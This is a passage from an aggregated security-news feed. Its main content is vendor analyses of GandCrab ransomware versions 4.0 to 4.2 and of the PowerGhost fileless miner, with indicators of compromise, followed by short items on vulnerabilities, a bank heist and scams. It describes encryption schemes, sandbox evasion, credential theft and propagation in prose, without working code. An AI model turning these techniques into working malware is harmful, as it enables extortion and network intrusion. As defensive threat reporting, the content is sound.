  • Trojanized legitimate programs containing the malware, or downloading and launching it
  • Exploits kits such as RigEK and others

The goal of GandCrab, as with other ransomware, is to encrypt all or many files on an infected system and insist on payment to unlock them. The developer requires payment in cryptocurrency, primarily DASH, because it complex to track, or Bitcoin.

The malware is usually but not always packed. We have seen variants in .exe format (the primary form) along with DLLs. GandCrab is effectively ransomware as a service; its operators can choose which version they want.

Version 4.0

The most important change in Version 4.0 is in the algorithm used to encrypt files. Earlier versions used RSA and AES; the latest versions use Salsa20. The main reason is for speed. RSA is a powerful but slow algorithm. Salsa20 is quick and the implementation is small.

The ransomware checks the language of the system and will not drop the malicious payload if the infected machine operates in Russian or certain other former Soviet languages:

Figure 2. Checking the language of the infected system.

GandCrab encrypts any file that does not appear on the following file-extension exclusion list:

The ransomware does not encrypt files in these folders:

GandCrab leaves these files unencrypted:

The ransomware generates a pair of RSA keys before encrypting any file. The public key encrypts the Salsa20 key and random initialization vector (IV, or nonce)) generated later for each file.

The encryption procedure generates a random Salsa20 key and a random IV for each file, encrypts the file with them, and encrypts this key and IV with a pair of RSA keys (with the public RSA key created at the beginning). The private key remains encrypted in the registry using another Salsa20 key and IV encrypted with an RSA public key embedded in the malware.

After encryption, the file key and IV are appended to the contents of the file in a new field of 8 bytes, increasing the original file size.

This method makes GandCrab very strong ransomware because without the private key to the embedded public key, it is not possible to decrypt the files. Without the new RSA private key, we cannot decrypt the Salsa20 key and IV that are appended to the file.

Finally, the ransomware deletes all shadow volumes on the infected machine and deletes itself.

Version 4.1

This version retains the Salsa20 algorithm, fixes some bugs, and adds a new function. This function, in a random procedure from a big list of domains, creates a final path and sends the encrypted information gathered from the infected machine. We do not know why the malware does this; the random procedure usually creates paths to remote sites that do not exist.

For example, one sample of this version has the following hardcoded list of encrypted domains. (This is only a small part of this list.)

The ransomware selects one domain from the list and creates a random path with one of these words:

Later it randomly chooses another word to add to the URL it creates:

Afterward it makes a file name, randomly choosing three or four combinations from the following list:

Finally the malware concatenates the filename with a randomly chosen extension:

At this point, the malware sends the encrypted information using POST to the newly generated URL for all domains in the embedded list, repeating the process of generating a path and name for each domain.

Another important change in this version is the attempt to obfuscate the calls to functions such as VirtualAlloc and VirtualFree.

Figure 3. New functions to obfuscate the code.

Version 4.1.2

This version has appeared with some variants. Two security companies revealed a vaccine to prevent infections by previous versions. The vaccine involved making a special file in a folder with a special name before the ransomware infects the system. If this file exists, the ransomware finishes without dropping the payload.

The file gets its name from the serial number of the Windows logic unit hard disk value. The malware makes a simple calculation with this name and creates it in the %appdata% or %program files% folder (based in the OS) with the extension .lock.

Figure 4. Creating the special file.

The GandCrab author reacted quickly, changing the operation to make this value unique and use the Salsa20 algorithm with an embedded key and IV with text referring to these companies. The text and the value calculated were used to make the filename; the extension remained .lock.

One of the security companies responded by making a free tool to make this file available for all users, but within hours the author released another Version 4.1.2 with the text changed. The malware no longer creates any file, instead making a mutex object with this special name. The mutex remains and keeps the .lock extension in the name.

Figure 5. Creating a special mutex instead of a special lock file.

The vaccine does not work with the second Version 4.1.2 and Version 4.2, but it does work with previous versions.

Version 4.2

This version has code to detect virtual machines and stop running the ransomware within them.

It checks the number of remote units, the size of the ransomware running compared with certain sizes, installs a VectoredExceptionHandler, and checks for VMware virtual machines using the old trick of the virtual port in a little encrypted shellcode:

Figure 6. Detecting VMware.

The malware calculates the free space of the main Windows installation logic unit and finally calculates a value.

If this value is correct for the ransomware, it runs normally. If the value is less than 0x1E, it waits one hour to start the normal process. (It blocks automatic systems that do not have “sleep” prepared.) If the value is greater than 0x1E, the ransomware finishes its execution.

Figure 7. Checking for virtual machines and choosing a path.


GandCrab is the leading ransomware threat for any person or enterprise. The author uses many ways to install it—including exploits kits, phishing mails, Trojans, and fake programs. The developer actively updates and improves the code to make analysis more difficult and to detect virtual machines. The code not is professionally written and continues to suffer from bugs, yet the product is well promoted in underground forums and has increased in value.

McAfee detects this threat as Ran-GandCrab4 in Versions 4.0 and later. Previous ones are also detected.

Indicators of compromise


This sample uses the following MITRE ATT&CK techniques:

  • File deletion
  • System information discovery
  • Execution through API
  • Execution through WMIC
  • Application process discovery: to detect antimalware and security products as well as normal programs
  • Query registry: to get information about keys that the malware needs make or read
  • Modify registry
  • File and directory discovery: to search for files to encrypt
  • Encrypt files
  • Process discovery: enumerating all processes on the endpoint to kill some special ones
  • Create files
  • Elevation of privileges


  • 9a80f1866450f2f10fa69b1eb8747c344d6ef038468014c59cc50497f9e4675d – version 4.0
  • d9466be5c387eb2fbf619a8cd0922b167ea7fa06b63f13cd330ca974cae1d513 – version 4.0
  • 43b57d2b16c44041916f3b0562712d5dca4f8a42bc00f00a023b4a0788d18276 – version 4.0
  • 786e3c693fcdf55466fd6e5446de7cfeb58a4311442e0bc99ce0b0985c77b45d – version 4.0
  • f5e74d939a5b329dddc94b75bd770d11c8f9cc3a640dccd8dff765b6997809f2 – version 4.1
  • 8ecbfe6f52ae98b5c9e406459804c4ba7f110e71716ebf05015a3a99c995baa1 – version 4.1
  • e454123d852e6a40eed1f2552e1a1ad3c00991541d812fbf24b70611bd1ec40a – version 4.1
  • 0aef79fac6331f9eca49e711291ac116e7f6fbaeb5a1f3eb7fea9e2e4ec6a608 – version 4.1
  • 3277c1649972ab5b43ae9e87087b70ea4825956bfdddd1034f7b0680e6d46efa – version 4.1
  • a92af825bd95b6514f22dea08a4eb6d3491cbad45e69a5b9653b0148ee9f9832 – version 4.1
  • ce093ffa19f020a2b73719f653b5e0423df28ef1d59035d55e99154a85c5c668 – version 4.1.2 (first)
  • a1aae5ae7a3722b83dc1c9b0831c973641b246808de4f3670f2fd916cf498d38 – version 4.1.2 (second)
  • 3b0096d6798b1887cffa1288583e93f70e656270119087ceb2f832b69b89260a – version 4.2
  • e8e948e36fed93061062406693d1b2c402dd8e5788506bfbb50dbd86a5540829 – version 4.2



The post GandCrab Ransomware Puts the Pinch on Victims appeared first on McAfee Blogs.

McAfee Blogs

Blog | Avast EN: The Secret’s Out: Reports of the privacy of private browsing have been greatly exaggerated

Sure, surfing the web in “incognito” or “private” mode might seem more secure than doing it with a totally unsecured browser—the phrases imply an air of security—but recent research and an overwhelming amount of anecdotal evidence from security experts indicates that so-called private browsing isn’t nearly as private as it’s cracked up to be. In fact, it’s not really private at all: routers, firewalls, proxy servers, RAM chips or the Domain Name System (DNS) cache all could have a record of your browsing history.

Blog | Avast EN

CRN: Deliver Uncompromising Protection With The FortiGate 7000 Series

To be effective in today’s evolving threat landscape, your security solution needs to reliably control high volumes of network and cloud traffic. To be effective in large enterprises it needs to be simple to manage, easily scalable and future-proof. Discover how Fortinet’s FortiGate chassis-based next-generation firewalls deliver uncompromising protection at the edge, and in the core.


SecuriTeam Blogs: SSD Advisory – LINE Corporation URI Handlers Remote Commands Execution

Vulnerabilities Summary LINE for Windows provided by LINE Corporation specifies the path to read DLL when launching software. A user clicking on a specially crafted link, can use this vulnerability to cause the user to insecurely load an arbitrary DLL which can be used to cause arbitrary code execution. Vendor Response “We released version 5.8.0 … Continue reading SSD Advisory – LINE Corporation URI Handlers Remote Commands Execution

SecuriTeam Blogs

SolarWinds MSP Blog: MSP Growth Strategies…What to Do When Referrals Stop

Most managed service provider (MSP) businesses were founded on a need and a reputation. A friend or an associate needed a service and someone said, “Hey I worked with this guy that’s a genius with networks and computers. Let’s give him a call and see if he can help us out.” A relationship was formed and a new business was born. After that, word-of-mouth and referrals added a few more clients, and before long, a business became a reality.

Read More

SolarWinds MSP Blog

Blog | Avast EN: Build-your-own banking trojan, ransomware on the high seas, and SIM card chaos | Avast

Source code to Exobot banking trojan leaked

“This has happened in the past, and it poses a risk as we saw in the case of the infamous Mirai botnet,” says Avast Security Evangelist Luis Corrons, speaking to the news that the source code to a potent bank trojan known as Exobot has been released into the wild of the dark web for anyone who cares to use it for their own ill will. The publicly-shared Mirai source code gave malware architects the blueprints to a powerful botnet, upon which they expanded. “Many malware writers used it to create their own customized version of the bot. We can expect the same here,” adds Luis.

Blog | Avast EN

E Hacking News – Latest Hacker News and IT Security News: A regional Virginia bank, the National Bank of Blacksburg, following a fruitful …

A regional Virginia bank, the National Bank of Blacksburg, following a fruitful phishing attack that compromised the entire organization's interior networks has lost $2.4 million in a digital heist that affected the STAR ATM along with the debit network.

As per an April 2018 profit proclamation from the National Bankshares, the parent organization of the bank, National Bank's computer system experienced two digital interruptions, in the month of May in the year 2016 as well as in January of 2017.

In the two cases, the interlopers could infiltrate an inner workstation with a phishing exertion and a weaponized Microsoft Word document. From that point onwards, the attackers installed the malware, and pivoted to a machine on the network that had access to the bank's interface with the STAR network.

The hackers made withdrawals at several ATMs, recommending a profoundly organized exertion. National Bank employed Foregenix to examine the 2016 episode and Verizon to deal with the forensics for the 2017 break, as indicated by the claim. According to the reports, the two organizations followed the movement back to the IP addresses situated in Russia.

Leroy Terrelonge, director of intelligence and operations at Flashpoint, in an interview said that,
 “Actors who target banks are primarily financially motivated, they want a large return on their investment in gaining access to the bank and performing reconnaissance. When attackers are able to establish a presence on a network through deployment of malware or using stolen credentials, they can often remain in stealth for a period of weeks or months, and they use that time to observe the activity of normal users at the bank and perform reconnaissance of the systems, processes and procedures used. ”  

The bank is presently suing its insurance carrier for not covering the full extent of the damage. In the claim, it clarified that it had two sorts of coverage for the cyber issues: The Computer and Electronic Crime Rider, which covers a wide swath of odious action and misfortunes up to $8 million for every hack; and the Debit card Rider, which has a $500,000 cap for each incident.

With respect to the bank's inner endeavors at cyber security in the wake of the hacks, National Bankshares president and CEO Brad Denardo issued a short media explanation addressing the matter:

“I would like to reassure our shareholders and our customers that we take cyber security very seriously. We have taken the necessary steps to avoid cyber intrusions of the sort we experienced in 2016 and 2017, and we continually work to monitor and prevent future threats.”

E Hacking News - Latest Hacker News and IT Security News

E Hacking News – Latest Hacker News and IT Security News: Physical USB security keys in Google

A physical USB security key has been a crucial mechanism for Google to help thousands of its employees get rid of the hackers who keep looking for formulas to infect the devices these days. But the hackers have not been able to take on none of the employees working with the global search engine. The reason for this safety is none but the USB security key. The physical security keys is said to have replaced the one time code of the around 85,000 employees working with the global platform. Security keys, precisely, comprises Keys two- authentications (2FA). If the users log log into a website with a password before entering an extra one time code meant for smart devices then it is 2FA. Google keeps sending the one time password to its employees with the help of an app which indeed is the in house mechanism. According to an expert associated with the search engine, Google keeps using the physical security keys for all works-related account access for the last one and a half years. Google officials say an user needs to authenticate the security key for different apps depending on the sensitivity of the app. Here the physical security key uses a version of multi-factor authentication, popularly known as Universal 2nd Factor (U2F) and it helps an user log in using the USB device. Once a device is connected to a website, an user need not enter the passwords. Facebook, Dropbox, Github et al keep using U2F and this they call an open source authentication standard.
But it is to be supported by a browser like Chrome, Firefox and Opera. Microsoft is further said to have been updating the Edge browser to get the support of U2F later. Yubico, a physical security key maker which is available at basic U2F key for $20.

E Hacking News - Latest Hacker News and IT Security News

Blog | Avast EN: Bluetooth flaw allows man-in-the-middle attacks | Avast

The IoT world is abuzz with the discovery of a new Bluetooth flaw that opens the door to man-in-the-middle attacks, which are exactly what they sound like — attacks where a third party wedges itself between two of your networked devices and helps itself to the sensitive data stored on each. These attacks are possible when the network has weak or no security, and that is precisely the problem inherent in CVE-2018-5383, a cryptographic flaw that affects two Bluetooth features — Secure Simple Pairing and LE Secure Connections.

Blog | Avast EN

The Ethical Hacker Network: Book Review: Social Engineering: The Science of Human Hacking

In his new book, “Social Engineering: The Science of Human Hacking, 2nd Edition,” Chris Hadnagy really hits the mark by providing a great overview of social engineering techniques, explaining how and why they work, and giving the reader plenty of real-world examples to back it all up. The target audience is humans as Chris explains. If you are human, I […]

The post Book Review: Social Engineering: The Science of Human Hacking appeared first on The Ethical Hacker Network.

The Ethical Hacker Network

Securelist – Kaspersky Lab’s cyberthreat research and reports: A mining multitool

Recently, an interesting miner implementation appeared on Kaspersky Lab’s radar. The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers. This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation. The creators of PowerGhost, however, went further and started using fileless techniques to establish the illegal miner within the victim system. It appears the growing popularity and rates of cryptocurrencies have convinced the bad guys of the need to invest in new mining techniques – as our data demonstrates, miners are gradually replacing ransomware Trojans.

Technical description and propagation method

PowerGhost is an obfuscated PowerShell script that contains the core code and the following add-on modules: the actual miner, mimikatz, the libraries msvcp120.dll and msvcr120.dll required for the miner’s operation, a module for reflective PE injection and a shellcode for the EternalBlue exploit.

Fragment of the obfuscated script

The add-on modules encoded in base64

The malicious program uses lots of fileless techniques to remain inconspicuous to the user and undetected by antivirus technologies. The victim machine is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive.

What the script does after that can be broken down into several stages:

  • Automatic self-update. PowerGhost checks if a new version is available on the C&C. If there is, it downloads the new version and launches it instead of itself.
  • Propagation.With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI. By “a copy of itself” here and below we mean the one-line script that downloads the miner’s body from the C&C.
    PowerGhost also tries to spread across the local network using the now-notorious EternalBlue exploit (MS17-010, CVE-2017-0144).
  • Escalation of privileges. As the miner spreads via mimikatz and WMI, it may end up on a new machine with user rights. It will then attempt to escalate its privileges in the system with the 32- or 64-bit exploits for MS16-032, MS15-051 and CVE-2018-8120.
  • Establishing a foothold in the system. PowerGhost saves all the modules as properties of a WMI class. The miner’s body is saved in the form of a one-line PowerShell script in a WMI subscription that activates every 90 minutes.
  • Payload.Lastly, the script launches the miner by loading a PE file via reflective PE injection.

In one PowerGhost version, we detected a tool for conducting DDoS attacks. The malware writers obviously decided to make some extra money by offering DDoS services.

PowerShell function with the tell-tale name RunDDOS

It’s worth pointing out that this is the only one of the miner’s functions that copies files to the hard drive. This is quite possibly a test tool that will later be replaced with a fileless implementation. Also supporting the assertion that this function was added to this version as an afterthought is the peculiar way the DDoS module is launched: the script downloads two PE modules, logos.png and cohernece.txt. The former is saved to the hard drive as java-log-9527.log and is an executable file for conducting DDoS attacks. The file cohernece.txt is protected with the software protection tool Themida, complete with a check for execution in a virtual environment. If the check does not detect a sandbox, then cohernece.txt launches the file java-log-9527.log for execution. In this curious way, the ready DDoS module was supplemented with a function to check for execution in a virtual environment.

Fragment of disassembled code of the file cohernece.txt

Statistics and geography

Corporate users bore the brunt of the attack: it’s easier for PowerGhost to spread within a company’s local area network.

Geography of infections by the miner

PowerGhost is encountered most often in India, Brazil, Columbia and Turkey.

Kaspersky Lab’s products detect the miner and/or its components with the following verdicts:

  • PDM:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen

E-wallets at and

  • 43QbHsAj4kHY5WdWr75qxXHarxTNQDk2ABoiXM6yFaVPW6TyUJehRoBVUfEhKPNP4n3JFu2H3PNU2Sg3ZMK85tPXMzTbHkb
  • 49kWWHdZd5NFHXveGPPAnX8irX7grcNLHN2anNKhBAinVFLd26n8gX2EisdakRV6h1HkXaa1YJ7iz3AHtJNK5MD93z6tV9H

Indicators of compromise

C&C hostnames:

  • 7h4uk[.]com
  • 128.43.62
  • 7h4uk[.]com


  • AEEB46A88C9A37FA54CA2B64AE17F248
  • 4FE2DE6FBB278E56C23E90432F21F6C8
  • 71404815F6A0171A29DE46846E78A079
  • 81E214A4120A4017809F5E7713B7EAC8

Securelist - Kaspersky Lab’s cyberthreat research and reports

Blog | Avast EN: Scam alert! Don’t fall for this webcam extortion ploy | Avast

A titillating new scam has hit the scene, but don’t let it work you up. It hits you with a one-two punch of first showing that it knows your password, then telling you a compromising video exists (taken with your own webcam) of you watching porn. The scammer threatens to send the video to everyone in your contacts if you don’t make a bitcoin payment to the provided address. In the examples we’ve seen, the amount requested ranges from $1900 to $7000 (and it could be more). To further the discomfort, the scammer adds that the video has been rendered in a split-screen format that shows the actual XXX clip you were watching alongside your real-time reactions to it.

Blog | Avast EN